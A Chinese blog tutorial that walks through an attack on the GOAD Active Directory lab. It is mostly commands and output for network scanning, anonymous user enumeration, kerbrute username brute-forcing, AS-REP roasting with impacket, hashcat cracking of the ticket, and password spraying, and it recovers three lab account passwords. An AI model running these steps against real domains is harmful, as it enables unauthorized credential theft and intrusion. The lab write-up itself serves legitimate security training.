上一篇文章写的有点乱,既然是博客,应该事无巨细的写一篇教程文。此篇我将从域渗透教学的角度来描述如何一步步渗透进入GOAD

扫描和侦查

网络扫描

NETEXEC简单探测

在域渗透中,我们可以通过NetExec进行简单的域内Windows扫描

1
nxc smb 192.168.56.0/24

nxc_scan

我们可知当前有三个域

1
2
3
essos.local
sevenkingdoms.local
north.sevenkingdoms.local

通过signing:True,可猜测这三台就是域控,使用Ldap端口扫描

1
nxc ldap 192.168.56.0/24

nxc_ldap_scan

可以确定有三台域控。

配置HOSTS

我们需要在本地机器上设置hosts文件,以便后续使用Kerberos协议

1
2
3
4
5
6
7
# /etc/hosts
# GOAD
192.168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12   essos.local meereen.essos.local meereen
192.168.56.22   castelblack.north.sevenkingdoms.local castelblack
192.168.56.23   braavos.essos.local braavos

NMAP全端口扫描

为了扩充攻击面,我们将对目前已知的机器进行全端口扫描

1
nmap -Pn -p- -sC -sV -oA full_scan 192.168.56.10-12,22-23

解读一下这些参数

-Pn 不使用ping来探活

-p- 扫描全端口

-sc运行默认的侦察脚本

-sV 探测系统版本

-oA用三种结果保存到 full_scan

扫描结果太长了就不展示了

分析扫描结果

通过sevenkingdoms.local和essos.local,在google上搜索,可以判定为《权力的游戏》或者是《冰与火之歌》有关的域。虽然这是一个靶场,但是我们也可以在实战中运用这项社会工程学技能。

image-20251221163650496

寻找域用户

在域控上匿名枚举域账号

1
nxc smb 192.168.56.0/24 --users

Enumerate

我们在WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL中枚举到了十个域账号,并且意外收获了一个密码

samwell.tarly:Heartsbane

这些账号我们也可以验证我们在上一步的OSINT,我们寻找的是正确的信息。

image-20251221164936719

有密码时我们可以使用ldapdomaindump来获取域信息。

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

我们获得了NORTH.SEVENKINGDOMS.LOCAL上所有的账户

OSINT+暴力枚举帐号

我们通过上面的分析扫描结果中的OSINT获取账号名,并将其按照另一个域名上格式来设置密码。(这种格式在大多域内都是通用的)

可以写一个简单的sh脚本,从网络上爬取相关用户名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/bash

# Fetch webpage and extract character names
curl -s "https://www.hbomax.com/shows/game-of-thrones/4f6b4985-2dc9-4ab6-ac79-d60f0860b0ac/cast-and-crew" | \
grep -o '>[A-Z][a-z]* [A-Z][a-z]*<' | \
sed 's/>//g; s/<//g' | \
awk '
BEGIN { count = 0 }
{
    count++
    if (count > 11 && (count - 12) % 2 == 0) {
        # Convert to lowercase and replace spaces with dots
        name = tolower($0)
        gsub(/ /, ".", name)
        print name
    }
}' | \
sort | uniq

我们可以使用kerbrute来进行账号名爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~]
└─$ kerbrute userenum -d essos.local --dc 192.168.56.12 got_users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:32:31 >  Using KDC(s):
2025/12/21 06:32:31 >  	192.168.56.12:88

2025/12/21 06:32:31 >  [+] VALID USERNAME:	 [email protected]
2025/12/21 06:32:31 >  [+] VALID USERNAME:	 [email protected]
2025/12/21 06:32:31 >  [+] VALID USERNAME:	 [email protected]
2025/12/21 06:32:31 >  [+] VALID USERNAME:	 [email protected]
2025/12/21 06:32:36 >  Done! Tested 80 usernames (4 valid) in 5.003 seconds

也可以用nmap进行账号爆破,我们在另一个域上用nmap试一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~]
└─$ nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=got_users.txt" 192.168.56.10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-21 06:32 EST
Nmap scan report for sevenkingdoms.local (192.168.56.10)
Host is up (0.00035s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     [email protected]
|_    [email protected]
MAC Address: 00:0C:29:CC:C8:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

寻找未授权的SMB

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.0/24 -u 'a' -p '' --shares
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.12   445    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.23   445    BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB         192.168.56.12   445    MEEREEN          [-] essos.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.22   445    CASTELBLACK      [-] north.sevenkingdoms.local\a: STATUS_LOGON_FAILURE
SMB         192.168.56.23   445    BRAAVOS          [+] essos.local\a: (Guest)
SMB         192.168.56.23   445    BRAAVOS          [*] Enumerated shares
SMB         192.168.56.23   445    BRAAVOS          Share           Permissions     Remark
SMB         192.168.56.23   445    BRAAVOS          -----           -----------     ------
SMB         192.168.56.23   445    BRAAVOS          ADMIN$                          Remote Admin
SMB         192.168.56.23   445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         192.168.56.23   445    BRAAVOS          C$                              Default share
SMB         192.168.56.23   445    BRAAVOS          CertEnroll                      Active Directory Certificate Services share
SMB         192.168.56.23   445    BRAAVOS          IPC$            READ            Remote IPC
SMB         192.168.56.23   445    BRAAVOS          public                          Basic Read share for all domain users
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

有一个可读写

有用户名但是没有密码的情况

ASREP - roasting

比如说咱之前在north.sevenkingdoms.local 上ldapdomaindump获取的所有用户名。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
sql_svc
jeor.mormont
samwell.tarly
jon.snow
hodor
rickon.stark
brandon.stark
sansa.stark
robb.stark
catelyn.stark
eddard.stark
arya.stark
krbtgt
vagrant
Guest
Administrator

保存到users.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~]
└─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:c0d425fe45c54c3c18e875898bca120f$45ac4cb030568708dae3e1c6c2dc5777628b03f8c2a0c33cde1affe1005f3877c51d8c71a551bc2cec9d65b66ca4ee3dfac29d86e5adf504a3e1e627624951d1783896c0171c86530661894964b1faac172a3ba01fc851b43d54bfdec323e1502a9435f97a98c71c3a5794faeb1898393f448a387bef9483880de57fb38e9a3a16ff3709f6c01f5d51389a7e867d520ae37f30b1c5968abeeab45d0046d2e55f2235a94051938f261fb0fb4e91186c7588e0bb935b4dee180f0d66ac7d3c0cee54c0f78842495c662376e32815da9ca43d5a064d6af83336925e5634bd10f7cc60d4d9d7f9b3f4367b813d83dcf4f3e86dc18fd7ce2486aeaeca61b9c5d547ccb498d6bfa114
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User vagrant doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set

这就获取到的brandon.stark的票据。然后用hashcat去破解他

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~]
└─$ hashcat -m 18200 asrephash.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-13th Gen Intel(R) Core(TM) i9-13900H, 6956/13913 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory allocated for this attack: 513 MB (11083 MB free)

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

[email protected]:c0d425fe45c54c3c18e875898bca120f$45ac4cb030568708dae3e1c6c2dc5777628b03f8c2a0c33cde1affe1005f3877c51d8c71a551bc2cec9d65b66ca4ee3dfac29d86e5adf504a3e1e627624951d1783896c0171c86530661894964b1faac172a3ba01fc851b43d54bfdec323e1502a9435f97a98c71c3a5794faeb1898393f448a387bef9483880de57fb38e9a3a16ff3709f6c01f5d51389a7e867d520ae37f30b1c5968abeeab45d0046d2e55f2235a94051938f261fb0fb4e91186c7588e0bb935b4dee180f0d66ac7d3c0cee54c0f78842495c662376e32815da9ca43d5a064d6af83336925e5634bd10f7cc60d4d9d7f9b3f4367b813d83dcf4f3e86dc18fd7ce2486aeaeca61b9c5d547ccb498d6bfa114:iseedeadpeople

这就获取到了brandon.stark的密码为iseedeadpeople

密码喷洒

一种是用户名和密码一样的情况下(现实情况下非常少)

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~]
└─$ nxc smb 192.168.56.11 -u users.txt -p users.txt --no-bruteforce
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sql_svc:sql_svc STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jeor.mormont:jeor.mormont STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\samwell.tarly:samwell.tarly STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jon.snow:jon.snow STATUS_LOGON_FAILURE
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\hodor:hodor

第二种是部分密码复用的情况,可以用kerbrute,非常快

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~]
└─$ kerbrute passwordspray -d north.sevenkingdoms.local --dc 192.168.56.11 users.txt hodor

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 12/21/25 - Ronnie Flathers @ropnop

2025/12/21 06:56:44 >  Using KDC(s):
2025/12/21 06:56:44 >  	192.168.56.11:88

2025/12/21 06:56:44 >  [+] VALID LOGIN:	 [email protected]:hodor
2025/12/21 06:56:44 >  Done! Tested 16 logins (1 successes) in 0.019 seconds

总结

我们这次旅程总共获取了三个账户密码

分别是

1
2
3
samwell.tarly:Heartsbane(用户描述)
brandon.stark:iseedeadpeople(asreproasting)
hodor:hodor (密码喷洒)

文章参考Mayfly师傅较多部分。喜欢的师傅可以去看看。